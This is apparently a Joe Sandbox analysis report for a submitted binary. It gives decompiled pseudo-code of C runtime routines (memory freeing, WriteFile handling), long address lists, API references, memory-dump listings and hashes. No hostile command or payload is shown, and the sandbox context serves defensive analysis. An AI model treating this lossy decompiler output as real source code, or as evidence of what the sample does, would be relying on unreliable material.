                                                																	if(_t275 != 0) {
                                                																		_t445 = _t445 + 2;
                                                																		__eflags = _t445;
                                                																		_t424 =  *_t445 & 0x0000ffff;
                                                																	}
                                                																	__eflags = _t424;
                                                																	if(_t424 != 0) {
                                                																		continue;
                                                																	} else {
                                                																		__eflags = _t387;
                                                																		if(__eflags != 0) {
                                                																			goto L79;
                                                																		} else {
                                                																			break;
                                                																		}
                                                																		goto L80;
                                                																	}
                                                																}
                                                															}
                                                														}
                                                													} else {
                                                														_t338 = 0x3b;
                                                														__eflags =  *_t365 - _t338;
                                                														if( *_t365 != _t338) {
                                                															break;
                                                														} else {
                                                															goto L48;
                                                														}
                                                													}
                                                												}
                                                											}
                                                											goto L134;
                                                										}
                                                										_t259 = 0;
                                                										goto L80;
                                                									}
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						__eflags = _t445;
                                                						if(_t445 == 0) {
                                                							_t259 =  *(_t429 + (_t259 + 2 + _t259 + 2) * 8);
                                                						} else {
                                                							_push(_t445);
                                                							_push(_t259);
                                                							_push(_t429);
                                                							L83();
                                                						}
                                                						L80:
                                                						_pop(_t430);
                                                						_pop(_t446);
                                                						__eflags = _v12 ^ _t461;
                                                						_pop(_t366);
                                                						return E00C17193(_t259, _t366, _v12 ^ _t461, _t424, _t430, _t446);
                                                					}
                                                				}
                                                				L134:
                                                			}


















































































































































                                                0x00c21c5d
                                                0x00c21c65
                                                0x00c21c66
                                                0x00c21c6f
                                                0x00c21c72
                                                0x00c21c77
                                                0x00c21c79
                                                0x00c21c7b
                                                0x00c21c7e
                                                0x00c21d9b
                                                0x00c21d9e
                                                0x00c21c84
                                                0x00c21c84
                                                0x00c21c85
                                                0x00c21c87
                                                0x00c21c87
                                                0x00c21c8a
                                                0x00c21c8d
                                                0x00c21c90
                                                0x00c21c93
                                                0x00c21c95
                                                0x00c21c98
                                                0x00c21c9d
                                                0x00c21cab
                                                0x00c21cb5
                                                0x00c21cb8
                                                0x00c21cbb
                                                0x00c21cbb
                                                0x00c21cc6
                                                0x00c21ccb
                                                0x00c21cd0
                                                0x00000000
                                                0x00c21cd6
                                                0x00c21cd9
                                                0x00c21cd9
                                                0x00c21cdc
                                                0x00c21cde
                                                0x00c21ce1
                                                0x00c21ce3
                                                0x00c21ce3
                                                0x00c21ce3
                                                0x00c21ce6
                                                0x00c21ce6
                                                0x00c21ce6
                                                0x00c21cec
                                                0x00000000
                                                0x00000000
                                                0x00c21cf1
                                                0x00c21d08
                                                0x00c21d08
                                                0x00c21cf3
                                                0x00c21cf3
                                                0x00c21cfb
                                                0x00000000
                                                0x00c21cfd
                                                0x00c21cfd
                                                0x00c21d00
                                                0x00c21d06
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c21d06
                                                0x00c21cfb
                                                0x00c21d11
                                                0x00c21d11
                                                0x00c21d16
                                                0x00c21d1b
                                                0x00c21d1f
                                                0x00c21d2b
                                                0x00c21d2e
                                                0x00c21d31
                                                0x00c21d3b
                                                0x00c21d43
                                                0x00c21d4b
                                                0x00000000
                                                0x00c21d51
                                                0x00c21d55
                                                0x00c21da0
                                                0x00c21da9
                                                0x00c21dac
                                                0x00c21dae
                                                0x00c21db2
                                                0x00c21db6
                                                0x00c21dbb
                                                0x00c21dc0
                                                0x00c21db6
                                                0x00c21dc4
                                                0x00c21dc6
                                                0x00c21dc8
                                                0x00c21dcc
                                                0x00c21dcd
                                                0x00c21dd2
                                                0x00c21dd7
                                                0x00c21dcd
                                                0x00c21dda
                                                0x00c21ddd
                                                0x00c21de0
                                                0x00c21de3
                                                0x00c21de6
                                                0x00c21d57
                                                0x00c21d5a
                                                0x00c21d5d
                                                0x00c21d5f
                                                0x00c21d63
                                                0x00c21d67
                                                0x00c21d6c
                                                0x00c21d71
                                                0x00c21d67
                                                0x00c21d77
                                                0x00c21d79
                                                0x00c21d7e
                                                0x00c21d83
                                                0x00c21d88
                                                0x00c21d7e
                                                0x00c21d89
                                                0x00c21d8d
                                                0x00c21d8d
                                                0x00c21d90
                                                0x00c21d94
                                                0x00c21d97
                                                0x00c21d97
                                                0x00000000
                                                0x00c21d9a
                                                0x00000000
                                                0x00c21d4b
                                                0x00c21d0c
                                                0x00c21d0e
                                                0x00c21d0e
                                                0x00000000
                                                0x00c21d0e
                                                0x00c21ded
                                                0x00c21dee
                                                0x00c21def
                                                0x00c21df0
                                                0x00c21df1
                                                0x00c21df2
                                                0x00c21df7
                                                0x00c21dfb
                                                0x00c21dfd
                                                0x00c21e03
                                                0x00c21e0a
                                                0x00c21e0d
                                                0x00c21e10
                                                0x00c21e11
                                                0x00c21e12
                                                0x00c21e15
                                                0x00c21e16
                                                0x00c21e19
                                                0x00c21e1f
                                                0x00c21e21
                                                0x00c21e46
                                                0x00c21e50
                                                0x00c21e56
                                                0x00c21e58
                                                0x00c21e5e
                                                0x00c21e60
                                                0x00c220c0
                                                0x00c220c1
                                                0x00000000
                                                0x00c21e66
                                                0x00c21e66
                                                0x00c21e6a
                                                0x00c21fd8
                                                0x00c21ff5
                                                0x00c21ffa
                                                0x00c21ffd
                                                0x00c21fff
                                                0x00c22005
                                                0x00c22005
                                                0x00c22007
                                                0x00c2200a
                                                0x00c2200c
                                                0x00c22012
                                                0x00c22012
                                                0x00c22014
                                                0x00c2209b
                                                0x00c2209b
                                                0x00c2201a
                                                0x00c2201a
                                                0x00c2201c
                                                0x00c22022
                                                0x00c22025
                                                0x00c22028
                                                0x00c2202e
                                                0x00000000
                                                0x00000000
                                                0x00c22030
                                                0x00c22034
                                                0x00c2205d
                                                0x00c2205d
                                                0x00c2205f
                                                0x00c22036
                                                0x00c22036
                                                0x00c2203a
                                                0x00c2203e
                                                0x00c22045
                                                0x00c2204b
                                                0x00000000
                                                0x00c2204d
                                                0x00c2204d
                                                0x00c22050
                                                0x00c22053
                                                0x00c2205b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c2205b
                                                0x00c2204b
                                                0x00c2206a
                                                0x00c2206a
                                                0x00c2206c
                                                0x00c2209a
                                                0x00c2209a
                                                0x00000000
                                                0x00c2206e
                                                0x00c2206e
                                                0x00c22074
                                                0x00c22075
                                                0x00c22076
                                                0x00c22077
                                                0x00c2207c
                                                0x00c22082
                                                0x00c22085
                                                0x00c22087
                                                0x00c2208e
                                                0x00c22090
                                                0x00c22092
                                                0x00c22089
                                                0x00c22089
                                                0x00c2208a
                                                0x00000000
                                                0x00c2208a
                                                0x00c22087
                                                0x00000000
                                                0x00c2206c
                                                0x00c22063
                                                0x00c22065
                                                0x00c22068
                                                0x00c22068
                                                0x00000000
                                                0x00c22068
                                                0x00c220a1
                                                0x00c220a1
                                                0x00c220a2
                                                0x00c220a5
                                                0x00c220ab
                                                0x00c220ab
                                                0x00c220b4
                                                0x00c220b6
                                                0x00000000
                                                0x00c220b8
                                                0x00c220b8
                                                0x00c220ba
                                                0x00000000
                                                0x00c220bc
                                                0x00c220bc
                                                0x00c220bc
                                                0x00c220ba
                                                0x00c220b6
                                                0x00000000
                                                0x00c21e70
                                                0x00c21e70
                                                0x00c21e75
                                                0x00000000
                                                0x00c21e7b
                                                0x00c21e7b
                                                0x00c21e80
                                                0x00000000
                                                0x00c21e86
                                                0x00c21e86
                                                0x00c21e8c
                                                0x00c21e91
                                                0x00c21e93
                                                0x00c21e9a
                                                0x00c21e9b
                                                0x00c21e9d
                                                0x00000000
                                                0x00000000
                                                0x00c21ea3
                                                0x00c21ea3
                                                0x00c21ea7
                                                0x00c21ead
                                                0x00000000
                                                0x00c21eb3
                                                0x00c21eb5
                                                0x00c21eb6
                                                0x00c21eb9
                                                0x00000000
                                                0x00c21ebf
                                                0x00c21ebf
                                                0x00c21ec5
                                                0x00c21eca
                                                0x00c21ed4
                                                0x00c21ed8
                                                0x00c21edd
                                                0x00c21ee0
                                                0x00c21ee2
                                                0x00000000
                                                0x00c21ee4
                                                0x00c21ee4
                                                0x00c21ee6
                                                0x00c21ee9
                                                0x00c21ee9
                                                0x00c21eec
                                                0x00c21eef
                                                0x00c21eef
                                                0x00c21efa
                                                0x00c21efc
                                                0x00c21efe
                                                0x00000000
                                                0x00000000
                                                0x00c21efe
                                                0x00000000
                                                0x00c21f00
                                                0x00c21f00
                                                0x00c21f06
                                                0x00c21f09
                                                0x00c21f09
                                                0x00c21f17
                                                0x00c21f20
                                                0x00c21f25
                                                0x00c21f2b
                                                0x00c21f2e
                                                0x00c21f2f
                                                0x00c21f31
                                                0x00c21f3f
                                                0x00c21f3f
                                                0x00c21f46
                                                0x00c21fa7
                                                0x00000000
                                                0x00c21f48
                                                0x00c21f48
                                                0x00c21f56
                                                0x00c21f5b
                                                0x00c21f5e
                                                0x00c21f60
                                                0x00c220db
                                                0x00c220dd
                                                0x00c220de
                                                0x00c220df
                                                0x00c220e0
                                                0x00c220e1
                                                0x00c220e2
                                                0x00c220e7
                                                0x00c220ea
                                                0x00c220eb
                                                0x00c220f3
                                                0x00c220fa
                                                0x00c220fd
                                                0x00c220fe
                                                0x00c22101
                                                0x00c22105
                                                0x00c22106
                                                0x00c22109
                                                0x00c22119
                                                0x00c2213c
                                                0x00c22141
                                                0x00c22144
                                                0x00c22146
                                                0x00c223fc
                                                0x00c223fc
                                                0x00c223fc
                                                0x00000000
                                                0x00c2214c
                                                0x00c2214c
                                                0x00c2214f
                                                0x00c2214f
                                                0x00c22152
                                                0x00c22158
                                                0x00c2215e
                                                0x00c22161
                                                0x00c22163
                                                0x00c22166
                                                0x00c2216d
                                                0x00c22170
                                                0x00c22176
                                                0x00000000
                                                0x00000000
                                                0x00c22178
                                                0x00c2217c
                                                0x00c221a5
                                                0x00c221a5
                                                0x00c2217e
                                                0x00c2217e
                                                0x00c22182
                                                0x00c22186
                                                0x00c2218d
                                                0x00c22193
                                                0x00000000
                                                0x00c22195
                                                0x00c22195
                                                0x00c22198
                                                0x00c2219b
                                                0x00c221a3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c221a3
                                                0x00c22193
                                                0x00c221b2
                                                0x00c221b2
                                                0x00c221b4
                                                0x00c221bd
                                                0x00c221c3
                                                0x00c221c6
                                                0x00c221c6
                                                0x00c221c9
                                                0x00c221cc
                                                0x00c221cc
                                                0x00c221dc
                                                0x00c221ea
                                                0x00c221ef
                                                0x00c221f6
                                                0x00c221f8
                                                0x00000000
                                                0x00c221fe
                                                0x00c22204
                                                0x00c22211
                                                0x00c2221a
                                                0x00c22220
                                                0x00c2222d
                                                0x00c22234
                                                0x00c22239
                                                0x00c2223c
                                                0x00c2223e
                                                0x00c2247c
                                                0x00c22482
                                                0x00c22483
                                                0x00c22484
                                                0x00c22485
                                                0x00c22486
                                                0x00c22487
                                                0x00c2248c
                                                0x00c2248f
                                                0x00c22492
                                                0x00c22493
                                                0x00c224a5
                                                0x00c224aa
                                                0x00c224ac
                                                0x00c224b5
                                                0x00000000
                                                0x00c224b5
                                                0x00c224ae
                                                0x00c224b1
                                                0x00c224b3
                                                0x00000000
                                                0x00000000
                                                0x00c224bb
                                                0x00c22244
                                                0x00c22244
                                                0x00c22252
                                                0x00c22255
                                                0x00c2226b
                                                0x00c22272
                                                0x00c22277
                                                0x00c22257
                                                0x00c22257
                                                0x00c2225f
                                                0x00000000
                                                0x00c22261
                                                0x00c22261
                                                0x00c22267
                                                0x00c22267
                                                0x00c2225f
                                                0x00c2227e
                                                0x00c22285
                                                0x00c22288
                                                0x00c22386
                                                0x00c22389
                                                0x00c22396
                                                0x00c22399
                                                0x00c223a1
                                                0x00c223a1
                                                0x00c2238b
                                                0x00c22391
                                                0x00c22391
                                                0x00c2228e
                                                0x00c2228e
                                                0x00c2229a
                                                0x00c222a0
                                                0x00c222a6
                                                0x00c222a9
                                                0x00c222af
                                                0x00c222b2
                                                0x00c222b5
                                                0x00000000
                                                0x00000000
                                                0x00c222b7
                                                0x00c222c0
                                                0x00c222c4
                                                0x00c222cd
                                                0x00c222d1
                                                0x00c222d2
                                                0x00c222d8
                                                0x00c222de
                                                0x00c222e4
                                                0x00c222e7
                                                0x00000000
                                                0x00000000
                                                0x00c222e9
                                                0x00c22308
                                                0x00c22308
                                                0x00c2230b
                                                0x00c22328
                                                0x00c2232d
                                                0x00c22330
                                                0x00c22332
                                                0x00c22370
                                                0x00c22334
                                                0x00c22334
                                                0x00c2233a
                                                0x00c2233f
                                                0x00c22347
                                                0x00c22348
                                                0x00c22348
                                                0x00c2235f
                                                0x00c22366
                                                0x00c22369
                                                0x00c2236b
                                                0x00c2236b
                                                0x00c22376
                                                0x00c2237c
                                                0x00c2237c
                                                0x00c22381
                                                0x00000000
                                                0x00c22381
                                                0x00c222eb
                                                0x00c222ed
                                                0x00c222f2
                                                0x00c222f8
                                                0x00c22301
                                                0x00c22304
                                                0x00c22304
                                                0x00000000
                                                0x00c222ed
                                                0x00c223a4
                                                0x00c223a4
                                                0x00c223a8
                                                0x00c223b0
                                                0x00c223b6
                                                0x00c223b9
                                                0x00c223bf
                                                0x00c223c1
                                                0x00c2240d
                                                0x00c22413
                                                0x00c2245f
                                                0x00c2245f
                                                0x00c22415
                                                0x00c2241a
                                                0x00c2241a
                                                0x00c22420
                                                0x00c22424
                                                0x00000000
                                                0x00c22426
                                                0x00c2242a
                                                0x00c22433
                                                0x00c2243f
                                                0x00c22444
                                                0x00c2244d
                                                0x00c22453
                                                0x00c22456
                                                0x00c22456
                                                0x00c22424
                                                0x00c22465
                                                0x00c2246d
                                                0x00c22473
                                                0x00c22476
                                                0x00c223c3
                                                0x00c223c9
                                                0x00c223d3
                                                0x00c223e5
                                                0x00c223ec
                                                0x00c223f9
                                                0x00000000
                                                0x00c223f9
                                                0x00000000
                                                0x00c223c1
                                                0x00c2223e
                                                0x00c221b6
                                                0x00c221b6
                                                0x00c223fe
                                                0x00c22401
                                                0x00c22402
                                                0x00c22403
                                                0x00c22405
                                                0x00c2240c
                                                0x00c2240c
                                                0x00000000
                                                0x00c221b4
                                                0x00c221ad
                                                0x00c221af
                                                0x00c221af
                                                0x00000000
                                                0x00c221af
                                                0x00c21f66
                                                0x00c21f66
                                                0x00c21f69
                                                0x00c21f6e
                                                0x00c220d6
                                                0x00000000
                                                0x00c21f74
                                                0x00c21f76
                                                0x00c21f7e
                                                0x00c21f84
                                                0x00c21f85
                                                0x00c21f8b
                                                0x00c21f8c
                                                0x00c21f91
                                                0x00c21f97
                                                0x00c21f9a
                                                0x00c21f9c
                                                0x00c21f9e
                                                0x00c21f9f
                                                0x00c21f9f
                                                0x00c21fad
                                                0x00c21fad
                                                0x00c21fb0
                                                0x00c21fb3
                                                0x00c21fb5
                                                0x00c21fb8
                                                0x00c21fba
                                                0x00c21fba
                                                0x00c21fbd
                                                0x00c21fbd
                                                0x00c21fc0
                                                0x00c21fc3
                                                0x00000000
                                                0x00c21fc9
                                                0x00c21fc9
                                                0x00c21fcb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c21fcb
                                                0x00c21fc3
                                                0x00c21f6e
                                                0x00c21f60
                                                0x00c21f33
                                                0x00c21f35
                                                0x00c21f36
                                                0x00c21f39
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c21f39
                                                0x00c21f31
                                                0x00c21eb9
                                                0x00000000
                                                0x00c21ead
                                                0x00c21fd1
                                                0x00000000
                                                0x00c21fd1
                                                0x00c21e80
                                                0x00c21e75
                                                0x00c21e6a
                                                0x00c21e23
                                                0x00c21e23
                                                0x00c21e25
                                                0x00c21e3c
                                                0x00c21e27
                                                0x00c21e27
                                                0x00c21e28
                                                0x00c21e29
                                                0x00c21e2a
                                                0x00c21e2f
                                                0x00c220c7
                                                0x00c220ca
                                                0x00c220cb
                                                0x00c220cc
                                                0x00c220ce
                                                0x00c220d5
                                                0x00c220d5
                                                0x00c21e21
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 00C22FD9: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C2AB63,00000220,?,?,?,?,?,?,00C1B9BE,?,?,?), ref: 00C2300B
                                                • _free.LIBCMT ref: 00C21D6C
                                                • _free.LIBCMT ref: 00C21D83
                                                • _free.LIBCMT ref: 00C21DA0
                                                • _free.LIBCMT ref: 00C21DBB
                                                • _free.LIBCMT ref: 00C21DD2
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$AllocateHeap
                                                • String ID:
                                                • API String ID: 3033488037-0
                                                • Opcode ID: 281ae4e02fb9bd214b1243fca8297db12f40a885409243612c121087d55b1a43
                                                • Instruction ID: b089868cdae94d306af7cdf50d8dfd684a8b81d059a079a5477ce2e7f551b15d
                                                • Opcode Fuzzy Hash: 281ae4e02fb9bd214b1243fca8297db12f40a885409243612c121087d55b1a43
                                                • Instruction Fuzzy Hash: D151B372A00724EFDB22DF69EC41B6A77F4EF64720F180669E855D7690E731EA01DB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 237 c2741d-c27439 238 c275f0 237->238 239 c2743f-c27441 237->239 240 c275f2-c275f6 238->240 241 c27463-c27484 239->241 242 c27443-c27456 call c1da15 call c1da28 call c1d94e 239->242 244 c27486-c27489 241->244 245 c2748b-c27491 241->245 260 c2745b-c2745e 242->260 244->245 247 c27496-c2749b 244->247 245->242 248 c27493 245->248 249 c274ac-c274b5 call c26fc4 247->249 250 c2749d-c274a9 call c27d81 247->250 248->247 258 c274f0-c27502 249->258 259 c274b7-c274b9 249->259 250->249 261 c27504-c2750a 258->261 262 c2754a-c2756b WriteFile 258->262 263 c274bb-c274c0 259->263 264 c274dd-c274e6 call c26bb0 259->264 260->240 265 c2753a-c27543 call c27035 261->265 266 c2750c-c2750f 261->266 269 c27576 262->269 270 c2756d-c27573 GetLastError 262->270 267 c274c6-c274d3 call c26f5c 263->267 268 c275ba-c275cc 263->268 278 c274eb-c274ee 264->278 285 c27548 265->285 272 c27511-c27514 266->272 273 c2752a-c27538 call c271f9 266->273 287 c274d6-c274d8 267->287 276 c275d3-c275e6 call c1da28 call c1da15 268->276 277 c275ce-c275d1 268->277 279 c27579-c27584 269->279 270->269 272->268 282 c2751a-c27528 call c27110 272->282 273->278 276->260 277->238 277->276 278->287 280 c27586-c2758b 279->280 281 c275eb-c275ee 279->281 288 c275b7 280->288 289 c2758d-c27592 280->289 281->240 282->278 285->278 287->279 288->268 294 c27594-c275a6 call c1da28 call c1da15 289->294 295 c275ab-c275b2 call c1d9f2 289->295 294->260 295->260
                                                C-Code - Quality: 93%
                                                			E00C2741D(signed int _a4, void* _a8, signed int _a12) {
                                                				long _v8;
                                                				signed int _v12;
                                                				void* _v16;
                                                				signed int _v20;
                                                				intOrPtr _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				long _v40;
                                                				char _v44;
                                                				signed int _t59;
                                                				signed int _t64;
                                                				signed int _t66;
                                                				signed int _t68;
                                                				signed int _t71;
                                                				signed int _t72;
                                                				signed int _t74;
                                                				signed int _t81;
                                                				signed int _t84;
                                                				signed int _t91;
                                                				signed int _t93;
                                                				intOrPtr _t95;
                                                				signed int _t100;
                                                				intOrPtr _t101;
                                                				void* _t102;
                                                				signed int _t105;
                                                				signed int _t107;
                                                				void* _t109;
                                                
                                                				_t93 = _a12;
                                                				_v8 = _t93;
                                                				_t105 = _a4;
                                                				_t102 = _a8;
                                                				_v16 = _t102;
                                                				if(_t93 == 0) {
                                                					L37:
                                                					__eflags = 0;
                                                					return 0;
                                                				}
                                                				_t113 = _t102;
                                                				if(_t102 != 0) {
                                                					_t100 = _t105 >> 6;
                                                					_t59 = (_t105 & 0x0000003f) * 0x38;
                                                					_v20 = _t100;
                                                					_t101 =  *((intOrPtr*)(0xc99448 + _t100 * 4));
                                                					_v12 = _t59;
                                                					_t91 =  *((intOrPtr*)(_t101 + _t59 + 0x29));
                                                					__eflags = _t91 - 2;
                                                					if(_t91 == 2) {
                                                						L6:
                                                						__eflags =  !_t93 & 0x00000001;
                                                						if(__eflags == 0) {
                                                							goto L2;
                                                						}
                                                						_t59 = _v12;
                                                						L8:
                                                						__eflags =  *(_t101 + _t59 + 0x28) & 0x00000020;
                                                						if(__eflags != 0) {
                                                							E00C27D81(_t105, 0, 0, 2);
                                                							_t109 = _t109 + 0x10;
                                                						}
                                                						_t66 = E00C26FC4(_t101, __eflags, _t105);
                                                						__eflags = _t66;
                                                						if(_t66 == 0) {
                                                							_t95 =  *((intOrPtr*)(0xc99448 + _v20 * 4));
                                                							_t68 = _v12;
                                                							__eflags =  *((char*)(_t95 + _t68 + 0x28));
                                                							if( *((char*)(_t95 + _t68 + 0x28)) >= 0) {
                                                								asm("stosd");
                                                								asm("stosd");
                                                								asm("stosd");
                                                								_t71 = WriteFile( *(_t95 + _t68 + 0x18), _v16, _v8,  &_v40, 0);
                                                								__eflags = _t71;
                                                								if(_t71 == 0) {
                                                									_v44 = GetLastError();
                                                								}
                                                								goto L27;
                                                							}
                                                							_t81 = _t91;
                                                							__eflags = _t81;
                                                							if(_t81 == 0) {
                                                								E00C27035( &_v44, _t105, _t102, _v8); // executed
                                                								goto L16;
                                                							}
                                                							_t84 = _t81 - 1;
                                                							__eflags = _t84;
                                                							if(_t84 == 0) {
                                                								_t83 = E00C271F9( &_v44, _t105, _t102, _v8);
                                                								goto L16;
                                                							}
                                                							__eflags = _t84 != 1;
                                                							if(_t84 != 1) {
                                                								goto L33;
                                                							}
                                                							_t83 = E00C27110( &_v44, _t105, _t102, _v8);
                                                							goto L16;
                                                						} else {
                                                							__eflags = _t91;
                                                							if(__eflags == 0) {
                                                								_t83 = E00C26BB0(__eflags,  &_v44, _t105, _t102, _v8);
                                                								L16:
                                                								L14:
                                                								L27:
                                                								asm("movsd");
                                                								asm("movsd");
                                                								asm("movsd");
                                                								_t72 = _v28;
                                                								__eflags = _t72;
                                                								if(_t72 != 0) {
                                                									return _t72 - _v24;
                                                								}
                                                								_t74 = _v32;
                                                								__eflags = _t74;
                                                								if(_t74 == 0) {
                                                									_t102 = _v16;
                                                									L33:
                                                									__eflags =  *( *((intOrPtr*)(0xc99448 + _v20 * 4)) + _v12 + 0x28) & 0x00000040;
                                                									if(__eflags == 0) {
                                                										L35:
                                                										 *((intOrPtr*)(E00C1DA28(__eflags))) = 0x1c;
                                                										_t64 = E00C1DA15(__eflags);
                                                										 *_t64 =  *_t64 & 0x00000000;
                                                										L3:
                                                										return _t64 | 0xffffffff;
                                                									}
                                                									__eflags =  *_t102 - 0x1a;
                                                									if(__eflags == 0) {
                                                										goto L37;
                                                									}
                                                									goto L35;
                                                								}
                                                								_t107 = 5;
                                                								__eflags = _t74 - _t107;
                                                								if(__eflags != 0) {
                                                									_t64 = E00C1D9F2(_t74);
                                                								} else {
                                                									 *((intOrPtr*)(E00C1DA28(__eflags))) = 9;
                                                									_t64 = E00C1DA15(__eflags);
                                                									 *_t64 = _t107;
                                                								}
                                                								goto L3;
                                                							}
                                                							__eflags = _t91 - 1 - 1;
                                                							if(_t91 - 1 > 1) {
                                                								goto L33;
                                                							}
                                                							E00C26F5C( &_v44, _t102, _v8);
                                                							goto L14;
                                                						}
                                                					}
                                                					__eflags = _t91 - 1;
                                                					if(_t91 != 1) {
                                                						goto L8;
                                                					}
                                                					goto L6;
                                                				}
                                                				L2:
                                                				 *(E00C1DA15(_t113)) =  *_t62 & 0x00000000;
                                                				 *((intOrPtr*)(E00C1DA28( *_t62))) = 0x16;
                                                				_t64 = E00C1D94E();
                                                				goto L3;
                                                			}






























                                                0x00c27425
                                                0x00c27428
                                                0x00c2742d
                                                0x00c27431
                                                0x00c27434
                                                0x00c27439
                                                0x00c275f0
                                                0x00c275f0
                                                0x00000000
                                                0x00c275f0
                                                0x00c2743f
                                                0x00c27441
                                                0x00c27467
                                                0x00c2746d
                                                0x00c27470
                                                0x00c27473
                                                0x00c2747a
                                                0x00c2747d
                                                0x00c27481
                                                0x00c27484
                                                0x00c2748b
                                                0x00c2748f
                                                0x00c27491
                                                0x00000000
                                                0x00000000
                                                0x00c27493
                                                0x00c27496
                                                0x00c27496
                                                0x00c2749b
                                                0x00c274a4
                                                0x00c274a9
                                                0x00c274a9
                                                0x00c274ad
                                                0x00c274b3
                                                0x00c274b5
                                                0x00c274f3
                                                0x00c274fa
                                                0x00c274fd
                                                0x00c27502
                                                0x00c27553
                                                0x00c27556
                                                0x00c27557
                                                0x00c27563
                                                0x00c27569
                                                0x00c2756b
                                                0x00c27573
                                                0x00c27573
                                                0x00000000
                                                0x00c27576
                                                0x00c27507
                                                0x00c27507
                                                0x00c2750a
                                                0x00c27543
                                                0x00000000
                                                0x00c27543
                                                0x00c2750c
                                                0x00c2750c
                                                0x00c2750f
                                                0x00c27533
                                                0x00000000
                                                0x00c27533
                                                0x00c27511
                                                0x00c27514
                                                0x00000000
                                                0x00000000
                                                0x00c27523
                                                0x00000000
                                                0x00c274b7
                                                0x00c274b7
                                                0x00c274b9
                                                0x00c274e6
                                                0x00c274eb
                                                0x00c274d6
                                                0x00c27579
                                                0x00c2757c
                                                0x00c2757d
                                                0x00c2757e
                                                0x00c2757f
                                                0x00c27582
                                                0x00c27584
                                                0x00000000
                                                0x00c275eb
                                                0x00c27586
                                                0x00c27589
                                                0x00c2758b
                                                0x00c275b7
                                                0x00c275ba
                                                0x00c275c7
                                                0x00c275cc
                                                0x00c275d3
                                                0x00c275d8
                                                0x00c275de
                                                0x00c275e3
                                                0x00c2745b
                                                0x00000000
                                                0x00c2745b
                                                0x00c275ce
                                                0x00c275d1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c275d1
                                                0x00c2758f
                                                0x00c27590
                                                0x00c27592
                                                0x00c275ac
                                                0x00c27594
                                                0x00c27599
                                                0x00c2759f
                                                0x00c275a4
                                                0x00c275a4
                                                0x00000000
                                                0x00c27592
                                                0x00c274bd
                                                0x00c274c0
                                                0x00000000
                                                0x00000000
                                                0x00c274ce
                                                0x00000000
                                                0x00c274d3
                                                0x00c274b5
                                                0x00c27486
                                                0x00c27489
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c27489
                                                0x00c27443
                                                0x00c27448
                                                0x00c27450
                                                0x00c27456
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 00C26BB0: GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 00C26BF8
                                                • WriteFile.KERNEL32(?,00000000,?,00C40F78,00000000,00000000,00000000,00000000,?,00C40F78,00000010,00C1EFF8,00000000,00000000,00000000,00000000), ref: 00C27563
                                                • GetLastError.KERNEL32(?,00000000), ref: 00C2756D
                                                • __dosmaperr.LIBCMT ref: 00C275AC
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
                                                • String ID:
                                                • API String ID: 910155933-0
                                                • Opcode ID: ee05c439a7377ceb83030a6a18dcec14c087244ea59d63afdd8c5b44c619d71d
                                                • Instruction ID: 9d01677dfdfbf46147f66ad1f626be994bb3f837457838386df9e4dbd31cb713
                                                • Opcode Fuzzy Hash: ee05c439a7377ceb83030a6a18dcec14c087244ea59d63afdd8c5b44c619d71d
                                                • Instruction Fuzzy Hash: A251F271A08129ABDB11EFA8E885FEEBFB4EF46324F140255F401A7691D330DA41EB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
